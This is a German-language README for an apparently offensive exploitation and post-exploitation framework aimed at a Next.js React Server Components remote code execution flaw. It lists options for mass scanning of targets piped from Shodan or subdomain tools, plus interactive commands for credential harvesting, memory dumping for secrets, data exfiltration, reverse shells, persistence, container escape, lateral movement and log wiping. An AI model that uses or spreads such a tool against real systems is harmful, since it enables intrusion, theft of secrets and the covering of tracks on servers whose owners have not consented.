R2S ist ein umfassendes Exploitation- und Post-Exploitation-Framework, das auf die Next.js React Server Components-Schwachstelle (CVE-2025-55182) abzielt. Es bietet eine interaktive Shell mit erweiterten Funktionen für Penetrationstests, einschließlich Dateiübertragung, Persistenz, Enumeration, Privilege-Escalation-Checks und mehr.
Erweitertes Post-Exploitation-Framework für Next.js React Server Components RCE
Funktionen • Installation • Verwendung • Befehle • Beispiele
R2S ist ein umfassendes Exploitation- und Post-Exploitation-Framework, das auf die Next.js React Server Components Schwachstelle (CVE-2025-55182) abzielt. Es bietet eine interaktive Shell mit erweiterten Funktionen für Penetrationstests, darunter Dateiübertragung, Persistenz, Enumeration, Privilegienausweitungsprüfungen und mehr.
.env-Dateien und Konfigurationsdateien# Python 3.6 oder höher
python3 --version
# Abhängigkeiten installieren
pip3 install requests urllib3
# Tool klonen oder herunterladen
cd r2s-main
# Ausführbar machen (optional)
chmod +x r2s_enhanced.py
# Tool ausführen
python3 r2s_enhanced.py -h
python3 r2s_enhanced.py [OPTIONEN]
| Option | Beschreibung | Standard |
|---|---|---|
-u, --url | Einzelne Ziel-URL | - |
-l, --list | Datei mit Liste von URLs | - |
-c, --cmd | Erster auszuführender Befehl | id |
-t, --threads | Anzahl der Scan-Threads | 30 |
-p, --proxy | HTTP-Proxy (z.B. http://127.0.0.1:8080) | - |
-v, --verbose | Ausführliche Ausgabe aktivieren | False |
--http-port | HTTP-Server-Port für Dateiübertragung | 8000 |
python3 r2s_enhanced.py -u http://target.com
python3 r2s_enhanced.py -l targets.txt -t 50
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
Sobald Sie RCE-Zugriff erhalten, gelangen Sie in eine interaktive Shell mit diesen Befehlen:
upload <lokale_datei> <entfernter_pfad> # Datei zum Ziel hochladen
download <entfernte_datei> <lokaler_pfad> # Datei vom Ziel herunterladen
cd <verzeichnis> # Arbeitsverzeichnis wechseln
pwd # Arbeitsverzeichnis anzeigen
enum # Vollständige System-Enumeration
privesc # Privilegienausweitungsprüfungen
harvest # Credential-Harvesting
portscan <ip> # Interne Netzwerk-Ports scannen
memdump [pid] # Prozessspeicher für Geheimnisse auslesen
lateral # Möglichkeiten für laterale Bewegung
escape # Container-Ausbruchsvektoren
exfil [typ] # Daten extrahieren (env/config/keys/db/logs/all)
reverse <lhost> <lport> # Mehrere Reverse-Shell-Payloads ausprobieren
persist # Einfache Persistenz hinzufügen
advpersist # Erweiterte Persistenz hinzufügen
stealth # Logs löschen und Spuren verwischen
save # Aktuelle Sitzung speichern
help, ? # Hilfemeldung anzeigen
exit, quit # Interaktive Shell beenden
Führen Sie jeden Shell-Befehl direkt aus:
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
$ python3 r2s_enhanced.py -u http://vulnerable-app.com